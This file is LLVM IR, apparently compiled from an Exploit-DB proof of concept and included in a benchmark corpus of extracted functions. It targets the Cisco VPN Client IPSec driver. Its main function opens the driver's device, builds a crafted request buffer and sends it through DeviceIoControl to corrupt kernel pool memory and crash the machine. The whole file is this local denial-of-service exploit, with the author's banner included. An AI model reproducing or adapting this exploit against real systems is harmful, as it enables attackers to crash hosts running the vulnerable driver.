; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/dos/extr_4911.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/dos/extr_4911.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.ioctl_req = type { i32* }

@.str = private unnamed_addr constant [148 x i8] c"Cisco VPN Client IPSec Driver local kernel system pool corruption PoC\0Aby: <mu-b@digit-labs.org>\0Ahttp://www.digit-labs.org/ -- Digit-Labs 2008!@$!\0A\0A\00", align 1
@.str.1 = private unnamed_addr constant [13 x i8] c"\\\\.\\CVPNDRVA\00", align 1
@FILE_EXECUTE = common dso_local global i32 0, align 4
@FILE_SHARE_READ = common dso_local global i32 0, align 4
@FILE_SHARE_WRITE = common dso_local global i32 0, align 4
@OPEN_EXISTING = common dso_local global i32 0, align 4
@INVALID_HANDLE_VALUE = common dso_local global i64 0, align 8
@stderr = common dso_local global i32 0, align 4
@.str.2 = private unnamed_addr constant [26 x i8] c"* CreateFileA failed, %d\0A\00", align 1
@EXIT_FAILURE = common dso_local global i32 0, align 4
@.str.3 = private unnamed_addr constant [26 x i8] c"* hitting.. [sizeof: %d]\0A\00", align 1
@CVPN_IOCTL = common dso_local global i32 0, align 4
@.str.4 = private unnamed_addr constant [26 x i8] c"* DeviceIoControl failed\0A\00", align 1
@.str.5 = private unnamed_addr constant [43 x i8] c"done\0A\0A* hmmm, you didn't STOP the box?!?!\0A\00", align 1
@EXIT_SUCCESS = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca %struct.ioctl_req, align 8
  %7 = alloca i64, align 8
  %8 = alloca i32, align 4
  %9 = alloca i32, align 4
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  %10 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([148 x i8], [148 x i8]* @.str, i64 0, i64 0))
  %11 = load i32, i32* @FILE_EXECUTE, align 4
  %12 = load i32, i32* @FILE_SHARE_READ, align 4
  %13 = load i32, i32* @FILE_SHARE_WRITE, align 4
  %14 = or i32 %12, %13
  %15 = load i32, i32* @OPEN_EXISTING, align 4
  %16 = call i64 @CreateFileA(i8* getelementptr inbounds ([13 x i8], [13 x i8]* @.str.1, i64 0, i64 0), i32 %11, i32 %14, i32* null, i32 %15, i32 0, i32* null)
  store i64 %16, i64* %7, align 8
  %17 = load i64, i64* %7, align 8
  %18 = load i64, i64* @INVALID_HANDLE_VALUE, align 8
  %19 = icmp eq i64 %17, %18
  br i1 %19, label %20, label %26

20:                                               ; preds = %2
  %21 = load i32, i32* @stderr, align 4
  %22 = load i64, i64* %7, align 8
  %23 = call i32 (i32, i8*, ...) @fprintf(i32 %21, i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str.2, i64 0, i64 0), i64 %22)
  %24 = load i32, i32* @EXIT_FAILURE, align 4
  %25 = call i32 @exit(i32 %24) #3
  unreachable

26:                                               ; preds = %2
  %27 = call i32 @memset(%struct.ioctl_req* %6, i32 0, i32 8)
  %28 = getelementptr inbounds %struct.ioctl_req, %struct.ioctl_req* %6, i32 0, i32 0
  %29 = load i32*, i32** %28, align 8
  %30 = getelementptr inbounds i32, i32* %29, i64 0
  store i32 105, i32* %30, align 4
  %31 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str.3, i64 0, i64 0), i64 8)
  %32 = call i32 @Sleep(i32 5000)
  %33 = load i64, i64* %7, align 8
  %34 = load i32, i32* @CVPN_IOCTL, align 4
  %35 = call i32 @DeviceIoControl(i64 %33, i32 %34, %struct.ioctl_req* %6, i32 8, %struct.ioctl_req* %6, i32 8, i32* %9, i32 0)
  store i32 %35, i32* %8, align 4
  %36 = load i32, i32* %8, align 4
  %37 = icmp ne i32 %36, 0
  br i1 %37, label %43, label %38

38:                                               ; preds = %26
  %39 = load i32, i32* @stderr, align 4
  %40 = call i32 (i32, i8*, ...) @fprintf(i32 %39, i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str.4, i64 0, i64 0))
  %41 = load i32, i32* @EXIT_FAILURE, align 4
  %42 = call i32 @exit(i32 %41) #3
  unreachable

43:                                               ; preds = %26
  %44 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([43 x i8], [43 x i8]* @.str.5, i64 0, i64 0))
  %45 = load i64, i64* %7, align 8
  %46 = call i32 @CloseHandle(i64 %45)
  %47 = load i32, i32* @EXIT_SUCCESS, align 4
  ret i32 %47
}

declare dso_local i32 @printf(i8*, ...) #1

declare dso_local i64 @CreateFileA(i8*, i32, i32, i32*, i32, i32, i32*) #1

declare dso_local i32 @fprintf(i32, i8*, ...) #1

; Function Attrs: noreturn
declare dso_local i32 @exit(i32) #2

declare dso_local i32 @memset(%struct.ioctl_req*, i32, i32) #1

declare dso_local i32 @Sleep(i32) #1

declare dso_local i32 @DeviceIoControl(i64, i32, %struct.ioctl_req*, i32, %struct.ioctl_req*, i32, i32*, i32) #1

declare dso_local i32 @CloseHandle(i64) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
